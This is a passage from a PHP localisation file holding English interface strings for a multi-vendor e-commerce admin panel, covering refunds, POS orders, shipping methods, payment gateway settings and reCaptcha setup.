your wishlist' => 'Already in your wishlist', 'Password Reset' => 'Password Reset', 'Reset Your password' => 'Reset Your password', 'Click to Reset' => 'Click to Reset', 'First' => 'First', 'Shop info updated successfully!' => 'Shop info updated successfully!', 'product_list' => 'Product list', 'Withdraw request sent successfully!' => 'Withdraw request sent successfully!', 'Edit Role' => 'Edit Role', 'Role Update' => 'Role Update', 'successfully product deleted!' => 'Successfully product deleted!', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'Changing some settings will take time to show effect please clear session or wait for 60 minutes else browse from incognito mode', 'order_hasbeen_cancelled' => 'Order hasbeen cancelled', 'bkash' => 'Bkash', 'username' => 'Username', 'Contact View' => 'Contact View', 'View_User_Message' => 'View User Message', 'Not_Seen_Yet' => 'Not Seen Yet', 'User' => 'User', 'Reply_from_admin' => 'Reply from admin', 'No_reply' => 'No reply', 'Feedback' => 'Feedback', 'Please_send_a_Feedback' => 'Please send a Feedback', 'Seen' => 'Seen', 'Send_Mail' => 'Send Mail', 'Configure_your_mail_setup_first' => 'Configure your mail setup first', 'Mail_Body' => 'Mail Body', 'amount_to_be_paid' => 'Amount to be paid', 'paytabs' => 'Paytabs', 'fawry_pay' => 'Fawry pay', 'merchant_code' => 'Merchant code', 'security_key' => 'Security key', 'profile_id' => 'Profile id', 'server_key' => 'Server key', 'base_url_by_region' => 'Base url by region', 'delivery_man_management' => 'Delivery man management', 'delivery-man' => 'Delivery-man', 'Add new delivery-man' => 'Add new delivery-man', 'deliveryman' => 'Deliveryman', 'first' => 'First', 'last' => 'Last', 'branch' => 'Branch', 'identity' => 'Identity', 'passport' => 'Passport', 'driving' => 'Driving', 'license' => 'License', 'nid' => 'Nid', 'restaurant' => 'Restaurant', 'id' => 'Id', 'number' => 'Number', 'Deliveryman List' => 'Deliveryman List', 'delete' => 'Delete', 'Update delivery-man' => 'Update delivery-man', 'images' => 'Images', 'Invalid credential or account suspended' => 'Invalid credential or account suspended', 'waiting_for_location' => 'Waiting for location', 'assign' => 'Assign', 'message' => 'Message', 'start' => 'Start', 'resource_type' => 'Resource type', 'shop' => 'Shop', 'add_banner' => 'Add banner', 'banner_form' => 'Banner form', 'banner_update_form' => 'Banner update form', 'pos' => 'Pos', 'system' => 'System', 'POS' => 'POS', 'sign_out' => 'Sign out', 'item' => 'Item', 'addon' => 'Addon', 'extra' => 'Extra', 'update_discount' => 'Update discount', 'percent' => 'Percent', 'update_tax' => 'Update tax', 'cash' => 'Cash', 'card' => 'Card', 'discounted_products' => 'Discounted products', 'forgot_password_verification_by' => 'Forgot password verification by', 'announcement_setup' => 'Announcement setup', 'background_color' => 'Background color', 'text' => 'Text', 'order_note' => 'Order note', 'stock_limit_products' => 'Stock limit products', 'quantity' => 'Quantity', 'quantity_update' => 'Quantity update', 'update_quantity' => 'Update quantity', 'update_product_quantity' => 'Update product quantity', 'to_decrease_product_quantity_use_minus_before_number._Ex: -10' => 'To decrease product quantity use minus before number. Ex: -10', 'product_quantity_updated_successfully!' => 'Product quantity updated successfully!', 'product_quantity_can_not_be_less_than_0_!' => 'Product quantity can not be less than 0 !', 'stock_limit_products_list' => 'Stock limit products list', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'The products are shown in this list which quantity is below', 'default_sort' => 'Default sort', 'quantity_sort_by_(low_to_high)' => 'Quantity sort by (low to high)', 'quantity_sort_by_(high_to_low)' => 'Quantity sort by (high to low)', 'order_sort_by_(low_to_high)' => 'Order sort by (low to high)', 'order_sort_by_(high_to_low)' => 'Order sort by (high to low)', 'minimum_stock_limit_for_warning' => 'Minimum stock limit for warning', 'EX:123' => 'EX:123', 'reCaptcha' => 'ReCaptcha', 'captcha' => 'Captcha', 'reCaptcha Setup' => 'ReCaptcha Setup', 'credentials' => 'Credentials', 'Site Key' => 'Site Key', 'Secret Key' => 'Secret Key', 'reCaptcha credential Set up Instructions' => 'ReCaptcha credential Set up Instructions', 'Add a ' => 'Add a ', 'label' => 'Label', '(Ex: Test Label)' => '(Ex: Test Label)', 'Select reCAPTCHA v2 as' => 'Select reCAPTCHA v2 as ', 'reCAPTCHA Type' => 'ReCAPTCHA Type', 'Sub type: I m not a robot Checkbox' => 'Sub type: I m not a robot Checkbox', 'domain' => 'Domain', '(For ex: demo.6amtech.com)' => '(For ex: demo.6amtech.com)', 'Check in ' => 'Check in ', 'Accept the reCAPTCHA Terms of Service' => 'Accept the reCAPTCHA Terms of Service', 'Press' => 'Press', 'Enter recaptcha value' => 'Enter recaptcha value', 'Please check the recaptcha' => 'Please check the recaptcha', 'Go to the facebook developer page' => 'Go to the facebook developer page', 'Click Here' => 'Click Here', 'If needed' => 'If needed', 'Provide Primary Email and press' => 'Provide Primary Email and press', 'In about section select' => 'In about section select', 'Select an app type and press' => 'Select an app type and press', 'Complete the add details form and press' => 'Complete the add details form and press', 'left sidebar' => 'Left sidebar', 'Make sure to check' => 'Make sure to check', 'must on' => 'Must on', 'Update Phone' => 'Update Phone', 'few_steps_ahead' => 'Few steps ahead', 'Verify' => 'Verify', 'ReCAPTCHA Failed' => 'ReCAPTCHA Failed', 'recaptcha' => 'Recaptcha', 'gallery' => 'Gallery', 'download' => 'Download', 'upload' => 'Upload', 'upload_zip_file' => 'Upload zip file', 'file_manager' => 'File manager', 'file_path_copied_successfully!' => 'File path copied successfully!', 'copy_path' => 'Copy path', 'third_party_apis' => 'Third party apis', 'map_api_hint' => 'NB: Client key should have enable map javascript api and you can restrict it with http refere. Server key should have enable place api key and you can restrict it with ip.', 'map_api_hint_2' => 'Map api hint 2', 'map_api_key' => 'Map api key', 'client' => 'Client', 'server' => 'Server', 'search_your_location_here' => 'Search your location here', 'search_here' => 'Search here', 'config_data_updated' => 'Config data updated', 'billing_address' => 'Billing address', 'choose_billing_address' => 'Choose billing address', 'high_low' => 'High low', 'same_as_shipping_address' => 'Same as shipping address', 'Please fill all required fields of shipping address' => 'Please fill all required fields of shipping address', 'Please fill all444 required fields' => 'Please fill all444 required fields', 'incomplete_info' => 'Incomplete info', 'mercadopago' => 'Mercadopago', 'access_token' => 'Access token', 'flutterwave' => 'Flutterwave', 'hash' => 'Hash', 'company_copyright_text' => 'Company copyright text', 'latitude' => 'Latitude', 'longitude' => 'Longitude', 'Please fill all required fields of shipping/billing address' => 'Please fill all required fields of shipping/billing address', 'shipping_to' => 'Shipping to', 'billing_to' => 'Billing to', 'Billing_address' => 'Billing address', 'invalid_customer_data' => 'Invalid customer data', 'show_locations_on_map' => 'Show locations on map', 'location' => 'Location', 'data' => 'Data', 'empty' => 'Empty', 'no_location_found' => 'No location found', 'billing' => 'Billing', 'UPDATE_ADDRESSES' => 'UPDATE ADDRESSES', 'access_denied' => 'Access denied', 'shipping_and_billing_address' => 'Shipping and billing address', 'Shipping_and_billing' => 'Shipping and billing', 'text_color' => 'Text color', 'Delivery-man removed!' => 'Delivery-man removed!', 'shipping_address_has_been_given_below' => 'Shipping address has been given below', 'A_Z' => 'A Z', 'Z_A' => 'Z A', 'A_to_Z' => 'A to Z', 'Z_to_A' => 'Z to A', 'Low_to_High' => 'Low to High', 'High_to_Low' => 'High to Low', 'analytics' => 'Analytics', 'analytics_script' => 'Analytics script', 'pixel_analytics_script' => 'Pixel analytics script', 'pixel_analytics_script_from_facebook' => 'Pixel analytics script from facebook', 'walking_customer' => 'Walking customer', 'new_order' => 'New order', 'current_customer' => 'Current customer', 'clear_cart' => 'Clear cart', 'coupon' => 'Coupon', 'add_new_customer' => 'Add new customer', 'Ex_:_ex@example.com' => 'Ex : ex@example.com', 'city' => 'City', 'extra_discount_added_successfully' => 'Extra discount added successfully', 'your_cart_is_empty' => 'Your cart is empty', 'this_discount_is_not_applied_for_this_amount' => 'This discount is not applied for this amount', 'amount_can_not_be_negative_or_zero!' => 'Amount can not be negative or zero!', 'coupon_added_successfully' => 'Coupon added successfully', 'coupon_is_invalid' => 'Coupon is invalid', 'selected' => 'Selected', 'product_quantity_is_not_enough!' => 'Product quantity is not enough!', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart!' => 'Product quantity can not be zero or less than zero in cart!', 'Product_quantity_updated!' => 'Product quantity updated!', 'Coupon Edit' => 'Coupon Edit', 'Discount on Purchase' => 'Discount on Purchase', 'Customer Name' => 'Customer Name', 'QTY' => 'QTY', 'DESC' => 'DESC', 'Items Price' => 'Items Price', 'VAT' => 'VAT', 'extra_discount' => 'Extra discount', 'Paid_by' => 'Paid by', 'THANK YOU' => 'THANK YOU', 'POS Order List' => 'POS Order List', 'pos_orders' => 'Pos orders', 'customer_info' => 'Customer info', 'Employee Edit' => 'Employee Edit', 'input if you want to change' => 'Input if you want to change', 'hi' => 'Hi', 'welcome_to_dashboard' => 'Welcome to dashboard', 'search_by_name_oremail_or_phone' => 'Search by name oremail or phone', 'search_by_name_or_email_or_phone' => 'Search by name or email or phone', 'pos_management' => 'Pos management', 'select minimum one box' => 'Select minimum one box', 'select_minimum_one_selection_box' => 'Select minimum one selection box', 'All Categories' => 'All Categories', 'paytm' => 'Paytm', 'paytm_merchant_key' => 'Paytm merchant key', 'paytm_merchant_mid' => 'Paytm merchant mid', 'paytm_merchant_website' => 'Paytm merchant website', 'liqpay' => 'Liqpay', 'privateKey' => 'PrivateKey', 'Redirecting_to_the_payment_page' => 'Redirecting to the payment page', 'short_cut_keys' => 'Short cut keys', 'to_click_order' => 'To click order', 'to_click_payment_submit' => 'To click payment submit', 'to_close_payment_submit' => 'To close payment submit', 'to_click_cancel_cart_item_all' => 'To click cancel cart item all', 'to_click_add_new_customer' => 'To click add new customer', 'to_submit_add_new_customer_form' => 'To submit add new customer form', 'to_click_short_cut_keys' => 'To click short cut keys', 'to_print_invoice' => 'To print invoice', 'to_cancel_invoice' => 'To cancel invoice', 'to_focus_search_input' => 'To focus search input', 'to_click_extra_discount' => 'To click extra discount', 'to_click_coupon_discount' => 'To click coupon discount', 'to_click_clear_cart' => 'To click clear cart', 'to_click_new_order' => 'To click new order', 'Are_you_sure ' => 'Are you sure ', 'You_want_to_remove_all_items_from_cart!!' => 'You want to remove all items from cart!!', 'pos_order' => 'Pos order', 'Print Invoice' => 'Print Invoice', 'POS_order' => 'POS order', 'extra_on_discount' => 'Extra on discount', 'Forgot Password' => 'Forgot Password', 'Forgot your password' => 'Forgot your password', 'Change your password in three easy steps. This helps to keep your new password secure' => 'Change your password in three easy steps. This helps to keep your new password secure', 'We will email you a temporary code' => 'We will email you a temporary code', 'clean_database' => 'Clean database', 'environment_setup' => 'Environment setup', 'You have new order Check Please' => 'You have new order Check Please', 'Ok let me check' => 'Ok let me check', 'smtp_mail' => 'Smtp mail', 'sendgrid_mail_config' => 'Sendgrid mail config', 'sendgrid_mail' => 'Sendgrid mail', 'refund_request' => 'Refund request', 'subtotal' => 'Subtotal', 'total_refund_amount' => 'Total refund amount', 'refund_reson' => 'Refund reson', 'refund_reason' => 'Refund reason', 'status_not_changable_now' => 'Status not changable now', 'refund_pending' => 'Refund pending', 'refund_requested_successful!!' => 'Refund requested successful!!', 'refund_setup' => 'Refund setup', 'refund_settings' => 'Refund settings', 'environment' => 'Environment', 'This_page_is_having_sensitive_data.Make_sure_before_changing.' => 'This page is having sensitive data.Make sure before changing.', 'APP_NAME' => 'APP NAME', 'APP_DEBUG' => 'APP DEBUG', 'True' => 'True', 'False' => 'False', 'APP_MODE' => 'APP MODE', 'Live' => 'Live', 'Dev' => 'Dev', 'APP_URL' => 'APP URL', 'DB_CONNECTION' => 'DB CONNECTION', 'DB_HOST' => 'DB HOST', 'DB_PORT' => 'DB PORT', 'DB_DATABASE' => 'DB DATABASE', 'DB_USERNAME' => 'DB USERNAME', 'DB_PASSWORD' => 'DB PASSWORD', 'BUYER_USERNAME' => 'BUYER USERNAME', 'PURCHASE_CODE' => 'PURCHASE CODE', 'refund_request_time_limit' => 'Refund request time limit', 'refund_request_day_limit' => 'Refund request day limit', 'day_limit' => 'Day limit', 'refund_day_limit_updated!!' => 'Refund day limit updated!!', 'refund_request_list' => 'Refund request list', 'approved' => 'Approved', 'refunded' => 'Refunded', 'rejected' => 'Rejected', 'refund_list' => 'Refund list', 'Order_details_id' => 'Order details id', 'product_name' => 'Product name', 'refund_details' => 'Refund details', 'refund_status_updated_successfully!!' => 'Refund status updated successfully!!', 'it is already refunded you can not change it!!' => 'It is already refunded you can not change it!!', 'You_want_to_change_refund_status!!' => 'You want to change refund status!!', 'order_Transactions' => 'Order Transactions', 'refund_status' => 'Refund status', 'change_refund_status' => 'Change refund status', 'refund_status_updated!!' => 'Refund status updated!!', 'DB_clean' => 'DB clean', 'Clean' => 'Clean', 'database' => 'Database', 'This_page_contains_sensitive_information.Make_sure_before_changing.' => 'This page contains sensitive information.Make sure before changing.', 'Clear' => 'Clear', 'Sensitive_data! Make_sure_before_changing.' => 'Sensitive data! Make sure before changing.', 'Cancelled' => 'Cancelled', 'refunded status can not be changed!!' => 'Refunded status can not be changed!!', 'refund_Transactions' => 'Refund Transactions', 'order_details_id' => 'Order details id', 'customer_id' => 'Customer id', 'transaction_type' => 'Transaction type', 'Search by orders id or order_details_id' => 'Search by orders id or order details id', 'refund_transaction_table' => 'Refund transaction table', 'Update Notification' => 'Update Notification', 'Notification Update' => 'Notification Update', 'you_can_refund_request_after_the_product_is_delivered!' => 'You can refund request after the product is delivered!', 'refund_approved' => 'Refund approved', 'refund_refunded' => 'Refund refunded', 'refund_placed_successfully' => 'Refund placed successfully', 're' => 'Re', 'no_attachment_found' => 'No attachment found', 'Search_by_order_id_or_order_details_id' => 'Search by order id or order details id', 'Refund Details' => 'Refund Details', 'Refund request' => 'Refund request', 'no_customer_found' => 'No customer found', 'customer_not_found' => 'Customer not found', 'product_not_found' => 'Product not found', 'Redirecting_to_the_payment' => 'Redirecting to the payment', 'total_refundable_amount' => 'Total refundable amount', 'Extra_discount_can_not_be_more_than_100_percent' => 'Extra discount can not be more than 100 percent', 'total_discount' => 'Total discount', 'total_tax' => 'Total tax', 'Seller POS' => 'Seller POS', 'Seller POS permission on/off' => 'Seller POS permission on/off', 'approved_note' => 'Approved note', 'rejected_note' => 'Rejected note', 'digitaly_paid' => 'Digitaly paid', 'payment_info' => 'Payment info', 'Email Verification' => 'Email Verification', 'Verify your email' => 'Verify your email', 'Token' => 'Token', 'email_failed' => 'Email failed', 'refund_status_change_log' => 'Refund status change log', 'refund_status_changed_log' => 'Refund status changed log', 'refund_request_id' => 'Refund request id', 'note' => 'Note', 'change_by' => 'Change by', 'changed_by' => 'Changed by', 'seller_info' => 'Seller info', 'additional_information' => 'Additional information', 'seller_email' => 'Seller email', 'seller_phone' => 'Seller phone', 'delivery_man_name' => 'Delivery man name', 'deliveryman_name' => 'Deliveryman name', 'not_assigned' => 'Not assigned', 'deliveryman_email' => 'Deliveryman email', 'deliveryman_phone' => 'Deliveryman phone', 'self_product' => 'Self product', 'order_details' => 'Order details', 'click_here' => 'Click here', 'deliveryman_info' => 'Deliveryman info', 'customer_details' => 'Customer details', 'rejected_reason' => 'Rejected reason', 'Customer_not_found' => 'Customer not found', 'refunded status can not be changed!! Admin already change the statusapproved!!' => 'Refunded status can not be changed!! Admin already change the statusapproved!!', 'refunded status can not be changed!! Admin already changed the status :rejected!!' => 'Refunded status can not be changed!! Admin already changed the status :rejected!!', 'refund_rejected' => 'Refund rejected', 'product_name_not_found' => 'Product name not found', 'Search_by_order_id' => 'Search by order id', 'submit_a_review' => 'Submit a review', 'successfully_added_review' => 'Successfully added review', 'refunded status can not be changed!! Admin already changed the status : approved!!' => 'Refunded status can not be changed!! Admin already changed the status : approved!!', 'inhouse_product' => 'Inhouse product', 'Business_mode' => 'Business mode', 'single_vendor' => 'Single vendor', 'multi_vendor' => 'Multi vendor', 'Becareful for change the mode' => 'Becareful for change the mode', 'Becareful before change the mode' => 'Becareful before change the mode', 'For single vendor operation' => 'For single vendor operation', 'deactive all seller product' => 'Deactive all seller product', 'please!!' => 'Please!!', 'sellersfgm .' => 'Sellersfgm .', 'Single_vendor' => 'Single vendor', 'turn on' => 'Turn on', 'turn off' => 'Turn off', 'For single vendor operation please deactive all seller product' => 'For single vendor operation please deactive all seller product', 'Search by orders id' => 'Search by orders id', 'refund_id' => 'Refund id', 'Search_by_order_id_or_refund_id' => 'Search by order id or refund id', 'Search by orders id _or_refund_id' => 'Search by orders id or refund id', 'deactive all seller!!' => 'Deactive all seller!!', 'digitally_paid' => 'Digitally paid', 'For multi vendor operation' => 'For multi vendor operation', 'For single vendor operation deactive all seller!!' => 'For single vendor operation deactive all seller!!', 'Now your multi vendor business mode is opening you can add new seller !!' => 'Now your multi vendor business mode is opening you can add new seller !!', 'order_canceled_successfully' => 'Order canceled successfully', 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).' => 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).', 'decimal_point_settings' => 'Decimal point settings', 'choose_priority_number' => 'Choose priority number', 'priority' => 'Priority', 'Thanks for your order' => 'Thanks for your order', 'The billing period for your paid subscription to Google Workspace begins tomorrow.' => 'nice', 'Items Ordered' => 'Items Ordered', 'thank_you_for_order' => 'Thank you for order', 'Go to your order' => 'Go to your order', 'seller_details' => 'Seller details', 'sub_totalvfdv' => 'Sub totalvfdv', 'inhouse_products' => 'Inhouse products', 'thanks_for_the_order' => 'Thanks for the order', 'Your_order_ID' => 'Your order ID', 'Ordered_Items' => 'Ordered Items', 'to_view_your_order_sign_into_your' => 'To view your order sign into your', 'to_view_your_order_sign_into_your6Valley' => 'To view your order sign into your6Valley', 'to_view_your_order_sign_into_your 6Valley account_and_please_click_below_button' => 'To view your order sign into your 6Valley account and please click below button', 'seller_shipping_method' => 'Seller shipping method', 'shipping_responsibility' => 'Shipping responsibility', 'shipping_responsibility_updated_successfully!!' => 'Shipping responsibility updated successfully!!', 'order_wise' => 'Order wise', 'category_wise' => 'Category wise', 'product_wise' => 'Product wise', 'for_inhouse_deliver' => 'For inhouse deliver', 'shipping_type_updated_successfully!!' => 'Shipping type updated successfully!!', 'update_category_shipping_cost' => 'Update category shipping cost', 'category_name' => 'Category name', 'not' => 'Not', 'yes' => 'Yes', 'multiply_with_QTY' => 'Multiply with QTY', 'no' => 'No', 'add_new_order_wise_shipping' => 'Add new order wise shipping', 'add_order_wise_shipping' => 'Add order wise shipping', 'order_wise_shipping_method' => 'Order wise shipping method', 'order wise shipping method Status updated successfully' => 'Order wise shipping method Status updated successfully', 'Order Wise Shipping Method deleted successfully' => 'Order Wise Shipping Method deleted successfully', 'inhouse_shipping' => 'Inhouse shipping', 'seller_wise_shipping' => 'Seller wise shipping', 'shipping_method_updated_successfully!!' => 'Shipping method updated successfully!!', 'shipping_cost' => 'Shipping cost', 'shipping_cost_multiply_with_quantity' => 'Shipping cost multiply with quantity', 'add_new_seller' => 'Add new seller', 'admin_approval_for_products' => 'Admin approval for products', 'approval_for_products' => 'Approval for products', 'new_product' => 'New product', 'product_wise_shipping_cost' => 'Product wise shipping cost', 'product_wise_shipping_cost_approval' => 'Product wise shipping cost approval', 'Update & Publish' => 'Update & Publish', 'admin_approval_for_products_updated_successfully!' => 'Admin approval for products updated successfully!', 'of' => 'Of', 'shipping Cost' => 'Shipping Cost', 'if the shipping responsibility is inhouse and product wise shipping is activated then this function will work' => 'If the shipping responsibility is inhouse and product wise shipping is activated then this function will work', 'product_details' => 'Product details', 'sorry_stock_is_limited' => 'Sorry stock is limited', 'New order received' => 'New order received', 'Notification mail for new order received' => 'Notification mail for new order received', 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel' => 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel', 'New order ID for you' => 'New order ID for you', 'updated_products' => 'Updated products', 'updated_product_list' => 'Updated product list', 'previous_shipping_cost' => 'Previous shipping cost', 'new_shipping_cost' => 'New shipping cost', 'deneied' => 'Deneied', 'deneid' => 'Deneid', 'status updated successfully' => 'Status updated successfully', 'shipping_info' => 'Shipping info', 'shipping_type' => 'Shipping type', 'choose_delivery_type' => 'Choose delivery type', 'by_self_delivery_man' => 'By self delivery man', 'by_third_party_delivery_service' => 'By third party delivery service', 'update_third_party_delivery_info' => 'Update third party delivery info', 'tracking_id' => 'Tracking id', 'delivery_service_name' => 'Delivery service name', 'optional' => 'Optional', 'updated_successfully!' => 'Updated successfully!', 'choose_delivery_man' => 'Choose delivery man', 'self_delivery' => 'Self delivery', 'delivery_man_phone' => 'Delivery man phone', 'delivery_info' => 'Delivery info', 'Enter captcha value' => 'Enter captcha value', 'Captcha Failed' => 'Captcha Failed', 'digit_after_decimal_point' => 'Digit after decimal point ', 'ex:0.00' => 'Ex:0.00', 'ex: 0.00' => 'Ex: 0.00', ' ex: 0.00' => ' ex: 0.00', 'the_lowest_number_get_highest_priority' => 'The lowest number get highest priority', 'the_lowest_number_will_get_highest_priority' => 'The lowest number will get highest priority', 'the_lowest_number_will_get_the_highest_priority' => 'The lowest number will get the highest priority', 'cost_per_product' => 'Cost per product', 'Please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'Please, make sure all the products delivery charges are up to date.', 'Main Banner' => 'Main Banner', 'Footer Banner' => 'Footer Banner', 'Popup Banner' => 'Popup Banner', 'Are_you_sure_remove_this_product' => 'Are you sure remove this product', 'product_removed_successfully' => 'Product removed successfully', 'Removed' => 'Removed', 'Create credentials' => 'Create credentials', 'OAuth client ID' => 'OAuth client ID', 'Web application' => 'Web application', 'ADD URI' => 'ADD URI', 'Authorized redirect URIs' => 'Authorized redirect URIs', 'Callback URI' => 'Callback URI', 'Create' => 'Create', 'Client ID' => 'Client ID', 'Client Secret' => 'Client Secret', 'Get Started' => 'Get Started', 'Continue' => 'Continue', 'Confirm Email' => 'Confirm Email', 'Other' => 'Other', 'Complete Registration' => 'Complete Registration', 'Create App' => 'Create App', 'Facebook Login' => 'Facebook Login', 'Set Up' => 'Set Up', 'Site URL' => 'Site URL', 'Base URL of the site ex:' => 'Base URL of the site ex:', 'Client OAuth Login' => 'Client OAuth Login', 'Valid OAuth Redirect URIs' => 'Valid OAuth Redirect URIs', 'Save Changes' => 'Save Changes', 'Currency status successfully changed.' => 'Currency status successfully changed.', 'This Currency cannot be removed due to payment gateway dependency!' => 'This Currency cannot be removed due to payment gateway dependency!', 'New Currency inserted successfully!' => 'New Currency inserted successfully!', 'Currency removed successfully!' => 'Currency removed successfully!', 'Currency updated successfully!' => 'Currency updated successfully!', 'ratio 1:1 ' => 'Ratio 1:1 ', '250x60 px' => '250x60 px ', 'choose_environment' => 'Choose environment', 'sandbox' => 'Sandbox', 'live' => 'Live', 'flash deals' => 'Flash deals', 'flash deal' => 'Flash deal', 'day' => 'Day', 'hrs' => 'Hrs', 'min' => 'Min', 'sec' => 'Sec', 'Main Section Banner' => 'Main Section Banner', 'Fast Delivery all accross the country' => 'Fast Delivery all accross the country', 'Safe Payment' => 'Safe Payment', '7 Days Return Policy' => '7 Days Return Policy', '100% Authentic Products' => '100% Authentic Products', 'ARRIVALS' => 'ARRIVALS', 'best sellings' => 'Best sellings', 'top rated' => 'Top rated', 'About Company' => 'About Company', 'NEWS LETTER' => 'NEWS LETTER', 'Subscribe to out neew channel to get latest updates' => 'Subscribe to out neew channel to get latest updates', 'Your Email Address' => 'Your Email Address', 'subscribe' => 'Subscribe', 'Head Office' => 'Head Office', 'Your subscription successfully done!!' => 'Your subscription successfully done!!', 'You already subcribed this site!!' => 'You already subcribed this site!!', 'subscriber_list' => 'Subscriber list', 'System Default currency updated successfully!' => 'System Default currency updated successfully!', 'Search Products' => 'Search Products', 'wish_listed' => 'Wish listed', 'Seller_info' => 'Seller info', 'chat' => 'Chat', 'Visit Store' => 'Visit Store', 'More From The Store' => 'More From The Store', 'ratings' => 'Ratings', 'Excellent' => 'Excellent', 'Good' => 'Good', 'Average' => 'Average', 'Below Average' => 'Below Average', 'Poor' => 'Poor', 'Product Review' => 'Product Review', 'You_can_track_your_order_by_clicking_the_below_button' => 'You can track your order by clicking the below button', 'overview' => 'Overview', 'Chat with seller' => 'Chat with seller ', 'Search products from this store' => 'Search products from this store', 'default currency can not be deleted!' => 'Default currency can not be deleted!', 'default currency can not be deleted!to delete change the default currency first!' => 'Default currency can not be deleted!to delete change the default currency first!', 'See the latest deals and exciting new offers' => 'See the latest deals and exciting new offers ', 'view more' => 'View more', 'no more review ' => 'No more review ', 'no more review remain to load' => 'No more review remain to load', 'Search_by_email' => 'Search by email', 'Ratio_1:1' => 'Ratio 1:1', 'Start a conversation' => 'Start a conversation', 'Your_shop_address' => 'Your shop address', 'SUPPORT TICKET ANSWER' => 'SUPPORT TICKET ANSWER', 'Date Submitted' => 'Date Submitted', 'Last Updated' => 'Last Updated', 'Submit message' => 'Submit message', 'subscribe to our new channel to get latest updates' => 'Subscribe to our new channel to get latest updates', 'account_&_shipping_info' => 'Account & shipping info', 'default language can not be deleted!to delete change the default language first!' => 'Default language can not be deleted!to delete change the default language first!', 'default language can not be deleted! to delete change the default language first!' => 'Default language can not be deleted! to delete change the default language first!', 'billing_input_by_customer' => 'Billing input by customer', 'deactive' => 'Deactive', 'days_free_delivery' => 'Days free delivery', 'access_denied!!' => 'Access denied!!', 'shipping_input_by_customer' => 'Shipping input by customer', 'My Wallet' => 'My Wallet', 'my_wallet' => 'My wallet', 'transection_history' => 'Transection history', 'wallet_amount' => 'Wallet amount', 'credit' => 'Credit', 'debit' => 'Debit', 'my_loyalty_point' => 'My loyalty point', 'customer_wallet' => 'Customer wallet', 'add_fund' => 'Add fund', 'report' => 'Report', 'customer_loyalty_point' => 'Customer loyalty point', 'customers_settings' => 'Customers settings', 'generate_sitemap' => 'Generate sitemap', 'Before delivered you need to make payment status paid!' => 'Before delivered you need to make payment status paid!', 'view_website' => 'View website', 'Order_list' => 'Order list', 'refund_management' => 'Refund management', 'POS_Orders' => 'POS Orders', 'export' => 'Export', 'Business_Setup' => 'Business Setup', 'System Settings' => 'System Settings', '3rd_party' => '3rd party', 'order_settings' => 'Order settings', 'product_code_sku' => 'Product code sku', 'generate' => 'Generate', 'code' => 'Code', 'minimum_order_quantity' => 'Minimum order quantity', 'Sorry the minimum order quantity does not match' => 'Sorry the minimum order quantity does not match', 'minimum_order_quantity_cannot_be_less_than_' => 'Minimum order quantity cannot be less than ', 'Setup' => 'Setup', 'reset' => 'Reset', 'product_setting' => 'Product setting', 'Total Product' => 'Total Product', 'Total Order' => 'Total Order', 'category_list' => 'Category list', 'Category_Name' => 'Category Name', 'Set_Priority' => 'Set Priority', 'Category_Logo' => 'Category Logo', 'refund_requests' => 'Refund requests', 'business_analytics' => 'Business analytics', 'Packaging' => 'Packaging', 'failed to delivery' => 'Failed to delivery', 'earning_statistics' => 'Earning statistics', 'most_popular_products' => 'Most popular products', 'Refund_Requests' => 'Refund Requests', 'Category_Setup' => 'Category Setup', 'Categories' => 'Categories', 'Sub_Categories' => 'Sub Categories', 'Sub_Sub_Categories' => 'Sub Sub Categories', 'Product_Attributes' => 'Product Attributes', 'promotion_management' => 'Promotion management', 'Offers_&_Deals' => 'Offers & Deals', 'Flash_Deals' => 'Flash Deals', 'Featured_Deal' => 'Featured Deal', 'Push_Notification' => 'Push Notification', 'announcement' => 'Announcement', 'help_&_support_section' => 'Help & support section', 'Support_Ticket' => 'Support Ticket', 'Reports' => 'Reports', 'Analysis' => 'Analysis', 'Sales_&_Transaction_Report' => 'Sales & Transaction Report', 'Statistics' => 'Statistics', 'Order_Transactions' => 'Order Transactions', 'Refund_Transactions' => 'Refund Transactions', 'Product_Report' => 'Product Report', 'Wishlisted_Products' => 'Wishlisted Products', 'user_management' => 'User management', 'Customer_List' => 'Customer List', 'wallet' => 'Wallet', 'Loyalty_Points' => 'Loyalty Points', 'Add_New_Seller' => 'Add New Seller', 'Seller_List' => 'Seller List', 'subscribers' => 'Subscribers', 'Employee_Role_Setup' => 'Employee Role Setup', 'Employees' => 'Employees', 'System_Settings' => 'System Settings', 'Pages_&_Media' => 'Pages & Media', 'pages' => 'Pages', 'Social_Media_Links' => 'Social Media Links', 'System_Setup' => 'System Setup', 'Business Setup' => 'Business Setup', 'Profile' => 'Profile', 'shop_banner' => 'Shop banner', 'shop_logo' => 'Shop logo', 'Search Ticket by Subject or status...' => 'Search Ticket by Subject or status...', 'packaging' => 'Packaging', 'Out_For_Delivery' => 'Out For Delivery', 'Failed_To_Delivery' => 'Failed To Delivery', 'Seller_Wallet' => 'Seller Wallet', 'Pending_Withdraw' => 'Pending Withdraw', 'Total_Commission_given' => 'Total Commission given', 'Aready_Withdrawn' => 'Aready Withdrawn', 'total_delivery_charge_earned' => 'Total delivery charge earned', 'total_tax_given' => 'Total tax given', 'Earning_statistics' => 'Earning statistics', 'This_Year' => 'This Year', 'This_Month' => 'This Month', 'This Week' => 'This Week', 'Top_selling_products' => 'Top selling products', 'OK' => 'OK', 'Product_Section' => 'Product Section', 'Search by Name' => 'Search by Name', 'Billing_Section' => 'Billing Section', 'Paid By' => 'Paid By', 'Card' => 'Card', 'Cancel_order' => 'Cancel order', 'place_Order' => 'Place Order', 'apply' => 'Apply', 'Product already added in cart' => 'Product already added in cart', 'Sorry product out of stock' => 'Sorry product out of stock', 'Item has been added in your cart!' => 'Item has been added in your cart!', 'Please choose all the options' => 'Please choose all the options', 'range' => 'Range', 'show' => 'Show', 'failed-to-deliver' => 'Failed-to-deliver', 'search_orders' => 'Search orders', 'Excel' => 'Excel', 'Order_ID' => 'Order ID', 'Order_Date' => 'Order Date', 'Total_amount' => 'Total amount', 'Order_Status' => 'Order Status', 'Limited_Stocks' => 'Limited Stocks', 'Product Type' => 'Product Type', 'barcode' => 'Barcode', 